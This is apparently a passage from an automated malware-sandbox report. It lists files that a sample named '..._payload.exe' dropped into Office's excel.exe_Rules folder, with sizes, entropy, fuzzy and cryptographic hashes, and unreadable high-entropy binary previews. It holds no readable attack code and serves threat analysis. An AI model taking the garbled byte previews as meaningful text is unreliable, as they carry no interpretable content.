                                                                                                                                                                      Preview:<?xml]c.>..x.<..T.Ul.% F.3...Q1.=O..3..%......5....U..V..nF.....Lb...Y.o.q....W..K._X.....*nF...]{....hW>GC..P!.^Tn...T.=..,.....|..]W. ...s.Jdm...k..u.uI...XG+.....N...s.%(..5.~.....O.....R....H.kW....Z.0.[v...../.Y............J.4y]j..H.'..6.H......NQ]...@J....zkA.p.q...rx........fU.....9..B1..wk.M.6.`.&........S...d....2..I/.1Lr.B9.:ZX...@>......#./.2i..HB.h|.Ji...)..7,.....>?.{.JT..K.\...Q...B./..j..~g......z.}... ..B...ro.....dD......p...7.o..{_cN.>$].8.<N.{V$...E...fr...h.CU...-...;.bR..4...`...:a .Y.(,..MCK.{2G$...5y.R...7.M..+l....*..GxE.MMT.._...d....m4.'P^z.;.....3..2.C?y.{A..../.mL...I.....?C.dSm.7.n......$.u$..F./U.no..A.h^}...0..j..........fb @t.+.t..H;...4......n..).g.............oS0..\UP.Y(.M.E.us.;......p.....An...~......<..wg......D.{..._C......v.1.....ja....k.j.-....o..;X6i.|.>8..P.n.M-.._.c.u...u..o..+I...nj.g..Y{1..,.m=...dP..*....>..s.1..D..3BO.#.<.=O..^.."m.V...'.v....lb0...u=......] O./..E"d.F........Gj.R.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510017v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1148
                                                                                                                                                                      Entropy (8bit):7.836493365634755
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:aoAd2fwEpq8oCj3Vdc1NwBF1UHgTk16vOnRGNL13Uym7eDeZ4ftt5o2bD:apWF7VosocvaGT3UV7UeZKt5bD
                                                                                                                                                                      MD5:0358545CD1CF4DCA89317085646D4834
                                                                                                                                                                      SHA1:9F6C97B6718D1BEAD5159261232588B552C0F97D
                                                                                                                                                                      SHA-256:AA408DD6A9177D56A2733805F78E63BF2A5E2CEFC1537C92C356DD510B0DCF98
                                                                                                                                                                      SHA-512:465E6C5C5C5321FDCAB1125F81B0CB36559FCF8B88576A4CC538579A2E7E04CE5696F31FB618CC763B904114CF4502FDB03CF9A1DCF9C2074DDC633E44C1948C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlX..&_...6$.S.!5.g..x.x..+@I|.R.?.9*%.((.X.C.S&S0./........O'..sO|..Z.V.d...Eq.`)..+.HO....(vEH.n.....~.>..........5w[....H..fRF........W....v...@......>..9.!.12........<..c.]..0.-.!.$96N5.^'.....!...S.B..\.O.M.Q.]gc.?7Ca.{...&~.v.9?B.../...a.l.6..d3...^V........,r.aN.....!.q&.nyA...5......*...R...........XXa%..86..q..v...._...........I.7....a,TkG`.Z.y..r@io..cH...l......" /.F........jhG..n(Z.....,....1K..~oS.S.E. .^...`.QE=.SN#.....s..1.p..6.I.+.F<...~...[.;.E...f..v....eN...#.....!........+...92...w.F...F.y.pb..6n{....eG.l.._D....N.G...|>....!.^...v-..z~.-ok.8...6....>.....#.......D.dR/Z....3D...!....l#.B..Sg#Z......g..L.;I....x.WT.\.u37......d.h.^..Iy\*odrPh..U..q._}..!d9.._D...;..j.../A.+.k.W...4I5.w=.....l..J....(.....D.=...pP.<.}.$...K.{..X[. ...D..VD*2.w....^l.Q.jbvJs$.i...E._T.1T...p.....&..V.%.;..t_...'....7........V..eJ.f^+iQ.`..@..ct+YZ.O..........0..;.>:...0.... e.lH../L7...`..%ad.N.-.mu>..e.Q...._#.~.nMx...Z.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510018v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1782
                                                                                                                                                                      Entropy (8bit):7.887510907231934
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:2tZiRQEWt4aAOAEKpAZYpOhpHAovZ4KEF2sLVux3aVeoSg+btotDlBEzRD42bD:2tZiReR1pipOzAovZ5DkVi6rE9rD
                                                                                                                                                                      MD5:614E4C69AEFF0F04C445F08BA8141B0B
                                                                                                                                                                      SHA1:41ADDDDF75FA17426719753625457FA3397D50E9
                                                                                                                                                                      SHA-256:B96A4793DD3BC87C1FA04D4363AC25CFCE00F851B5B924ED43C125CA64CC48EA
                                                                                                                                                                      SHA-512:320D03776D13998D1BCA1C3FB137E90959CCC0DEF9417DA7ECBC7904E63FB17620CF8C204241C98BF3FE72B5F32D747B91504CCE6B7E66C6E3C93AFDCDFF26B1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..Hv.!.y...."...@O....7Dn.P..=.H*..XT c.7..wG..!.H-..R.w9...L.'.m.KF......U...0...{FZno..Bt..IR.y."\....P.. g$.......db....x....z..f8..Y...?p8....9.#%c.R..b.jB....gEd.}m^k.....U.N...Hf..Q...(vg...V.G.....p....O.M......&.a..^....i..1.V.o..%.M'.R.g....-.-.J.>..Ba...GdwA.....H.H....jDcL...._1|..|-.._...3..F...%.J..>R..e.X.Frf9.......-.... .....$Qn\....7...B.~W6...#0j5......,F..~E......g`..E.>.>o*.;....;........I.Qy.qL........W?+L..^.[8.pQ..8.${f..&:...Q|.j.$*6..!.o#.....@$..-...9..p&!p....t.s..x.EL..2NZ.:.C`..4.c*............Z92wu ......G.....~_|N.Ta.....wD..z...._1.":w?..b.g...QiP..q...Z.....~....Ph.).(:..V.....2.....Z$..D...3.r.T....Nz..^.....).....\......I.B`7q/.y....`......F<A.]./.-..kW.=.c0I..8....>..Q.-..n.LC..z!..Q7q..t`..(...Qp.|....M..&.;.%.c<F.e.Yr$..^K...#..I,%po.Wv..Z..........T>E.....aC.VL.Te....Q......9.\.u...6zw.n..w...t...5.).5..... .....a.X...aO.dz...5..y.#i..<?...r!...#.gL.Y..K..0.....d..*.Fy(......Y...v.u..c..k.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510046v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):791
                                                                                                                                                                      Entropy (8bit):7.72049978106263
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:6QnPhkJ4lvKTxe32Wgfkgn3YD7qjkj2bD:68PhkJEvKle3kF8HQD
                                                                                                                                                                      MD5:EF5910930D0C3C2D7977C0927944271C
                                                                                                                                                                      SHA1:22E78353C91C753AB41238B7C3797651F3A12217
                                                                                                                                                                      SHA-256:CC8CB7F6D3BCC0154039382426BCA613B9F4B63913A565C5BF90A33B1E00336F
                                                                                                                                                                      SHA-512:7AD4B9A737A3206D9EFAD7A2D25E2FC7544B35A83EACEA51D19738B84C50F5E1AD49BEF9081B331EB437375BEA28F2F305721C9E0EC7F77DC2DA5E4385B1F11A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml........'..."...<...7......8...I...Z.n,.....wz....*......$(Om3#.C...|....-.M.Lc.F?W....9..3..T>^F/&..xj.l@.'....J....C.xdB..V. .@..C..........:.Z..+7.w..+.v.oCQ0.P/$........H......mx^.p0.N}....Rt..o4...}r...?<..f.,T.B.....^aR.oz<V.2..>z..X.sxk.r.=.q..+.?...........-n..Q...r.Z...B....$i............=.(SsF..0zE.s>.IH;.W.!.4...G~...h...?8h(8.......".e0k.%j..E.F.w.C......J~..($....nD.`..>.P5..x]S.y...8..>..1.w..?S..FS.^.E7II..?.%x.f....F.y...._.?..qC......p...f..._.]x...>2..-...9..... b.....pc.._,....i~......O.....Y....J... Y^....XN.Q~.y @.L"._..0.O;d..,i.......X......c.,.k9.i...o.V.&.mU..>.7..k.C.A.#.........&.rA....^....i.X.\....N.e......OJ.......]#.zldT.-.~..T...V.[.FmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510047v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1082
                                                                                                                                                                      Entropy (8bit):7.803661033182364
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:rWxeR59a48gW+qaXI4h9oZf4bYNA2zRGfIcl0sS2bD:rZHa48Gq/4h9+4YSic1pD
                                                                                                                                                                      MD5:23BB39BFE0A7EDD9F1F732C9D00A01CE
                                                                                                                                                                      SHA1:9C647DF18BCECEA0F40E8261589A596C0DDD1DFE
                                                                                                                                                                      SHA-256:47FC7F430F76F108BB81002E3187002477235571485958657217D7E355859478
                                                                                                                                                                      SHA-512:966B6F54494CB22B9E33D7B1B5B7F58B245F1F8030920665591ADE1A4875BFDF49DB1ECD65C25A99310703B1A586E1C62E9D40F0E7FB32ADD7D91C13B422B812
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...6.R.*e}........J.I..wn..%....'%Tp0.h..j...G5...........Z...]..a..zh...A...9...n....QGu..M..}...x..~-Zt:..||...)N) !(.|v.......Z.,<B:j=0.k.i3....!._2.6...>...<.s.F...#.2.m..kAV......$.SP.....=....#.qwI..<........".........W.Pw."w....M.{..CVv.c.....!&i...i.y........W.Z}..,.f..e(...._.._."...........<^\.M.l.$O.M...Q.Z...].K.2.uj.......k..KB...<..$.w~?..j6?...H.3.Em.........UQ?v6..BZ.IU.....#.m.7s..e..l.AUZ.i....].C.K).k.n`....`g.?_jz.WF..H.]%.m...AY.0".L*..2.|..X..&xe.k..M..s.D....a....^..#m(q...6ZF...dn.....o..,.....t..J}X......]n.\Qy......:'.q.-...`./...6`#z..$..a...:.....Q..Z("..>o..7~....l...VW\.Oz.U...V.%r...$<.aX...=5w..=..}.ye.1.W.IG..Lz>1^.;.KnJ..h...].?cw....,.4.(....b..$5.v..........Z.....1...'.v%.W..x......B...........-...&..........xq>.g...G....ol7=.=^..K.l........../T.}...B....(..o.(....?.d1~?.p.3....p..8+.zO......P,....lns:....m..".M'k8LI.>...".........{.z...1...[.........O......I..3.a;..jC..B..V.o...^<.D.^.....%.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510062v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1061
                                                                                                                                                                      Entropy (8bit):7.797995038360232
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:WwZdSYyubj/b5n59Ip+2MJYq4HtbbQ+nxzCf6x2bD:WWdJ3jD95w+9TCtbb3RKD
                                                                                                                                                                      MD5:6F18DFCFA5B68D2A086FC7372E04CE13
                                                                                                                                                                      SHA1:9F21410DE92B634547B864FA57EAE00E2BF95447
                                                                                                                                                                      SHA-256:69E595E2B63881F1F5FC7A690A632B1D976190A6F17BE35E0B5351FF66CC1CEA
                                                                                                                                                                      SHA-512:E323A4065DE5D6BE28F0DE9C1D83D06777DBD19D906193A57067A2ABAFB9BFA306AE62245BCDA430F0F4DE81A9698CAFC5BA564262BDCDCD724C27A9E4DAAA58
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml<.^.8{..G.Ajjg63.T!B..3e..........#...~Q.......9.2...:.`...*.8.g.Nw2+{T..7../.0}..6oU..#...2e.# >.q/..yyv.....=.X.<....Jv}.^.7...JKQ.(wH.;.....FK..*.a+.E.Gh2......).-..pM...c...y....[....j..._....W..2a..MS...4.^....T....o...32......~..]Z..D..mC...8....w},T..7...X\}...-gV.>)O.~).......-..*..p.%.......fh...4.VR.i:s..6.JHa.pw..!@.S...`.....r.N..^.r2.......A..a...".D.....+.l..Y7......n...H.O...]6...q...A...q..z..6...@.TGAnv.l...#.G..60`B.{._3-....2..q7|...'.%..&...a."w ..+...\IK ..S....S.o...._B.B..Pv.:.....y....e.O*.;r._..F...lS..Y..h.Uv...s*...Y...WYU......wr..B........hRN.M......5@4h.. /...3,~.......\G.>....=..<...(..^.{.(...9.(....X.g~.~.8...BDT..o....6.).trA.......`t.......|..!Z...2g^.Ff.& ...D..z._|.....0_...2.....-..S(.gq./...].R........-.f...{...G+.8...U.4....m...>.i.........qVl .......$...78..Y.P..'.^.....{.0+..]...`U.9...)in...+..F.d.......I&...0....).......'x.4..[........,..S.@&g......8.)...^*.F.s.......l:d<...cmMsRxMUuXypapZbGO

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510063v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):801
                                                                                                                                                                      Entropy (8bit):7.737391197957901
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:IuDchru/Pyin5hG8fwOE5JkvEmcJh22bD:ycPjn5k8fFE5HJh9D
                                                                                                                                                                      MD5:90D117BA92CF625C17C1E55D6E2F16F5
                                                                                                                                                                      SHA1:41A6F74C6BC666FF0D5FF02C3B944D49E49F44D9
                                                                                                                                                                      SHA-256:ACA61EE2E6ED0098F8E931DDBF171FFC4A8740A1AEFE375B5275914794DF48C2
                                                                                                                                                                      SHA-512:E5D2C116A58AFDCEC2C5EC98F1E649A0876A95E1F35CE4AA85425A49B01FE30A039A3216BBD28457431048052520BECC4ED31477D3BEBD850613614E0D468F17
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlu....UU..I.(.*=.+-),6).2..mf.Ou@..{~.Y.c..X.A.r.}T..3....*....-\^l.45.@....]?..j.f]...E_.UU.ir.:].v...Q...8.Y..C.#.B.....F9.l1.LHJ._........:E.'.+g...y.a{.S0.V..3/.s...|..".....Z.K_u...p.-....Q....?%....._&-.........d.3.|..|.g...$.A.G...........H?...#Mg...k.#...].<.6.D..z..~..A.../....t.xw)..(?...P...7+K[B.bu..j.....0..${[...3"../...J.-.h.S.H!.y&M_p.....x5D.9..hMd...D(~.....2a..X.....d.iI....+@8...O ..|... mZm.. .O@]..{b..v.A.aV...D.;....6.m..ZM.-W^....Qz.=.{(....h.:hY..9O.. 8..7.t...nVAlIv...'...:W.y=O....N..F#.2.......4WT..8..Q...>hU*5.......3.CcA..G..h.A%..C8U....-.KQ...[/.{...%.5.....B>......z.....3@U..3h;.I..r.M...g1f.........W3{.W..m.0.2_..e.<.f40..g...l...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63028v4.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1485
                                                                                                                                                                      Entropy (8bit):7.867362517411909
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:LRaCtviV1867AblSArtHgmKy/kSERQkIWLKXJI1ugt5KD8SdLaSdxONj1dXab82/:LltirSltAY8SErmXJDgt5KDX/O9TKY2/
                                                                                                                                                                      MD5:17068AAA0699519A53B5FC9EE825E654
                                                                                                                                                                      SHA1:B2A83601D639456D55E0F17DCB2D01D45EB65809
                                                                                                                                                                      SHA-256:46DABE6AEB2F2A80654D4EA0C196E25B6ADC4C9D5975D81FF61B7682C06693AE
                                                                                                                                                                      SHA-512:29833AA75F913805BBD24587D2387BB2D2E4D621A2A3458D66C83AE455C9F6919D11B51BC0CC039F9DCDBC0F97D47BC4C474FC8382DE0571F5D72C929DD5826D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....9.f.WP.....B`..&.o?.........W.Jx.I.....h....h..W....oQ..%... y#..m.9.y.i..u..Z|..9.c.....H...]..IOvJWBiVK:Q]....{..G..............C..%...bwl.#)..PpJ.C,"!....9v..L..F..:...D?......;,r.Y.J.9.I..IIc..*..9.....bG}.[.0iv...N.xn....t....R{G...TbL!..6'...i.@._2.....1.d@..?.e.W..!.z.,...Qf4.z:....0..'L0Z.....2...`...q....u9.h.;P...hq.g6..7].=.}.:c.{.....3L<..4....\.k.<~.._Y:.eX.b$..\...u.s.........{..2..14....^.\(...Ljm.G.yw.zgdxo..m\`.=.....(3.....P.&0.LM;K...!&...xg.{...H...z;.X..K..qJ....$.../;>\?.t.]/......?...8...q.M.q...E..~...>u....3.e...j:LL'.+.........^.+.c.lxn....s...$.....9I$J...8.9H..`.-.l.].nE.tR.S.....Rm....|~...!.z..u.........&_I..>A^...KO../..'4`.~m.@5....3...f.E..BSL.G.r.\..R...g...`12Y..U}..%.#......P.^...2.jg.!.1a#QF...P..w&.r..n......M.D|...ST.y=..M.......H..T,~gjf..O..3@..u..ah.`...oEm...>.#Rq.b...g...M...l\...8{h~.=FQ..i|C..t.q...?M...F.....&&AV5....7./.......4QP9/"...L..8&..w......~N).O.{.pb.f..}....H9...l.SP.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63030v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1340
                                                                                                                                                                      Entropy (8bit):7.870502769381465
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:IR/DfiirSo6/yNjBD9k4t+wn4RxUoMf+qOPwlliwUAFgXYMp2bD:Y/ziuSBsD9YRxUoMf+DwlpFgXYMCD
                                                                                                                                                                      MD5:ADC458E6FD8E2DD34E4CBF9D0C953652
                                                                                                                                                                      SHA1:13A38C700A723ECF944F9B5F14415514B129EF86
                                                                                                                                                                      SHA-256:D6A036294C703271A8E83D6143A44FA6ADCB49E80DB0B5D14F024B13FDCEBFB8
                                                                                                                                                                      SHA-512:215FD1F6C49524A942A340AC0F277DEE4D62870A08F942DDF05772335238938A6B903B14D6B4C16FD0FE136070F6A8F03536EE96F69B9AE7AEB2F27C269E9C01
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml......bL{l..(......s.h."...p..;.....O..J....a.J#,...G %.[.Y../.>w.;....I.G~...aL$WlK.H...{.).6..5:..?..u..H1.@...n._...=.!.x*A~....N.i.Q.#..?-..>...n.....T...q`.Xw... cW.Y._x..-...c1.hM...;..L...'..u.m4....3......(....@._.r.>.6. ..8Paw....eE........b.n.x.C'aw..A*x.i...O.tJy...4..M_..zA........o.0S..W.v..r..J...u....|......(<.../.......d.e.~4.b........zu.....=T|...0F....Oy..<Sz......-[......D.9*e.C_..rB.!.....]2._.v:......Vt18..!/...2..t...l.kEL..%..u6.X$.o.!H....j.v.n@..j..Y..}z.(.I.h.e......9c. .)...g.....Di.....iL...*...)....nb..xY.W...G.....a....r..~..X..pJ=?{|c.Y.8...]....B~%.2.w.pT.u&.........1j....j.._6..<..~.....0JM....N..0]j......o....D..}.a.x...Xq<.uG.;....>.`5...u.'...l..."m....M....!...pv......W.}X.M.!Z.%.%*>I...2..=...Y..O.,...g.X...J..D.C...V...s$.*.H...K.p..r.UJRS......e...({.\Zk..+M~L..h,S.....T......U.......B|.[.7..!h..........A.N.3Ut....o;....)B.MQ..R..q5@..C....._~.A?..X..eM&.9....C.E=+X.p.J.H..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63038v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1261
                                                                                                                                                                      Entropy (8bit):7.871242907458973
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:UJWwUuoWzdewEpnqwcW4EK2wRdR68HA167TJrr7Ib++Nj26rlHDxtlRL2bD:UmcxEmWXK2gdR6KA1sTJrPIb++hL9Dx2
                                                                                                                                                                      MD5:C75EBDB1D49BD191280FFD55F20C1ED1
                                                                                                                                                                      SHA1:E5321C40F1FBBE90A188D5B5FE6E60480329129F
                                                                                                                                                                      SHA-256:EA90714E08786E0D48D463B42D70010C29199A89ABBB2F1C626FBB1265243FD0
                                                                                                                                                                      SHA-512:5975581DCD6FF043354AC7515667A664BCA5B1C12D47BDD3D3ECB194A314A8FCF6DD208FA4E7A58E3213EDB93B094AAE5C099C7FF3F00F714A7A97A018BFB11A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml+.L....g.#1.\`./.!..;..p......s.\}0..+D..fs........M...Guj..X......E..-..Y.q..'.l.3...1i..5cr.tu.%.|W1.....QC...K.......ZF$.k.g..<o..q....'..C..hj.........ZO.T.......Xb%.iq-X{.O.}...............P...<q._...e...t2o.K.....WLOK]..S'WU.0.....e.........+J..@.PX.e.up.....l..o]G(.#...)Sl...L.U..o....K.O../|qc.%..1!..f...|..$..@2.......i.........9..cs.n=.@>.R..K.n..,....F.Tq..+BZ+T"..iwC...P0....gb.7...D.=. .e)..F....`.M=[.........x.....5..I....i............'....3/....c:.c9...>.~.}. .N.O/.<...W.C...4.Yv.F..Mw.6X.F..*,....(..'....8....`.l..YZ..&..}...R.......&. ...QV.z... .-F..z........X......U.X=xmj...@............p....V.g....z ..........b.&q....*.3!/..:._g.w.,....4.P.J...C=L.8.V>..R....1.Z...jx..)...e.d.p9;...[..n.....JC.oz.....U.F-t......;.y....jix....9....<..T.OS).........V|.... ...a...)3.%.A...h...+Wk.....>..k:..jY.w...RW$-..%..v...q.L\9f.(.l.._.....w..9..a....l;.d>.Z...YlN&.?5...MDN+t.b.0k....4...t...PyH.~.KZR..........C.N.N.\..K..1

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63040v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1268
                                                                                                                                                                      Entropy (8bit):7.821715390713873
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:gLPbH3REfiwft+uSAurz1NiRr2QPE+6Cn5usnPjfny4K2XD9dKuYGz+2bD:YrhEfi0tcrzUr2QPEPCn5lnPj9KsdKQp
                                                                                                                                                                      MD5:C9782724753B15E54FA0E3462C182283
                                                                                                                                                                      SHA1:FADB22D4DFB0E12A258AFE47B865307C81226EAF
                                                                                                                                                                      SHA-256:FCD0B20E317B71270829F2226D4BACDA0C792E0376324CD1CFE80BDB23CBBC69
                                                                                                                                                                      SHA-512:29FFA50515C107A678A2C9E904856CE65224FAA9249C74BDC7185D0CDD12D917398ACC68D558D46B6CF133D711FF8E9216B4B22EF43E781B39DE5C43DCC460AF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...o~g..Q....Y.ge....s..9....S....%2c.-Y(..x6....r..p...5.&..h..7.....D.h.>.g....:I".D|..7..h..'s...2+.<:.....s...(t...Y6^.npl.`.(^...z..5t)g....\A....^.N.4.t....bF......*...d.Tc.......V..n.gzpVu......>.....Z......S...Y;..v'.S.V....c....gZ..R]....E..$;.cD.}o..F..+...-.Q.0YB\..........W|@.>i...f.B....P3..Cm.L.?=.M......(.e.\Y...z.a..K...BvEwN,.>..CS..._7.Y..o.n...+. ...o"A..V:.V..6.t.\Qm..YF8.I...^..k..2G?+]l.dq..st...8....2L_...G.J.....V6,.u&=0aP...<y.]3.8..L....q.GD..(.R.erdUv_.Y...m.d...aS..."mP...g..6x....He.).!E..k...3|.>gy.en.*.....D+*>.4.mQV6,.<..vl..L...E.....<..1y...L^....h".%.X.'z.%V.....c.%G.&gvg_>.S.<g..)._/&.z&....WF..U.W....4.?!..+.Ih.{..q.w...........$...Fx..1..).M..zX......x.m..s`..d.h.|.3..u.y~..TA<`....*.F.}...<....q....{.....:...N.d..7.........`.6. M?J..>GL\.&..I8.g.)]......]"......e..9...q#.....=*w.y...Q'.U.q....h...^...$.+].I......@....&&I.<7.....>LS......ps.ki...Q....9..<...l..s3..fSH.^......H.JH...........4

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63041v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1815
                                                                                                                                                                      Entropy (8bit):7.876129446942111
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Lm21xepefRBUT2DpayNqyFm8xVFre7XoD:L7nNDwpyFmSFeD0
                                                                                                                                                                      MD5:0D813FBEE79285C35E12570816D18726
                                                                                                                                                                      SHA1:1C23C629B1A12F76B4D447D1D7CE293D9A5D8AF5
                                                                                                                                                                      SHA-256:63C9AE2132A42138597870C52161773D86A164E038A40D6E8D03A62AFE77ED9D
                                                                                                                                                                      SHA-512:B9B5445BCCA4AD4CF68C6FB5F33DD5E1AD732E7525B1B3481E407871670DC5FF278E59CCEBE685C99BE2C9443363C530737952F48D2BA6478EC7D23AAA815465
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..V...q.-.+.bYT.-.C....>"c..wp.G.[.8IS.S%.E.Zc.R]o......}...k..3i.$.f..N.U...e.....u.~.-.BH.ex..8!.)..?...9..j&?)9..mG.?I.=.K..h25K.].;4....;d..c...K..$e....}H...#%H...-...<.....C....D..?p]C.]..>...k..#...L.7...l.C.<.}J.(. ......c^......S........7......(r.n.u]..Zo7I'.F./{..V.K.I.E....J...Z".J|%.*mD.!.4ZF..X\.$....{.H..>D....([,.]_f.......X...2._.;.)%...h..rf....t......1[a.s..dZ..@<........9.'L*....=5j.[......;=.....Pac..R....6.CW........:.(.#...p.U...q.......-..!.~?Y.p....k.J.?.rx.(..d........X..\...........Q....>\+~.S|s....."....$...n1.I....a..-.8N...(...#.V......q{...oE.....&.....|.Q.T...I.Qm..........B...XE..C...).....H..S.E9....Z)H?#v..o..K.[..Cja...ynI./{UE..'...;._).Sy... !.......h...0.z.0U..%.NP.%.M..A...F.m.R....H..._Sn..|3.\.P9{.g.!c8M....'.w....V.B./F}.F+'(..QQ..F..]-.k?.*...=(u.m...o.E..f.9a....PN..E.PRo...C.pe*:w.y).Ao.7..|.k[k.b..6...vm.....}..#..#\Pw]....kB._.. 3.0~L\....=.....9......E..._U..~....ks...N....w....=

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63042v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1004
                                                                                                                                                                      Entropy (8bit):7.797320978588105
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:v4m6rQXpQtNQgYH+8JLYAkSs9NSaHgOlazvAuzROI9hQVUoYgRDoSMjn7aDOHDWO:v4RrCpQ7m1HbyrAOaoERnQVU7hRfg2bD
                                                                                                                                                                      MD5:BDE9076CE26F3DF56978F128F0B9F4D9
                                                                                                                                                                      SHA1:0A4047001E379BB76C4E0587B85A5FE28784AA7D
                                                                                                                                                                      SHA-256:74F801B069B06CBA8D9B906B5DECC3D43531FBF345FB2DBF20ECA925B61A9EEC
                                                                                                                                                                      SHA-512:32225398B3FB129234B4DCAB266BF89B603ED3B99C91892D092ED6EAC806149D2DBD9B3A7DFE8C149CB5A5FE456270C1363CFBC19B771CEA4C1A71D62C3E7E60
                                                                                                                                                                      Malicious:false
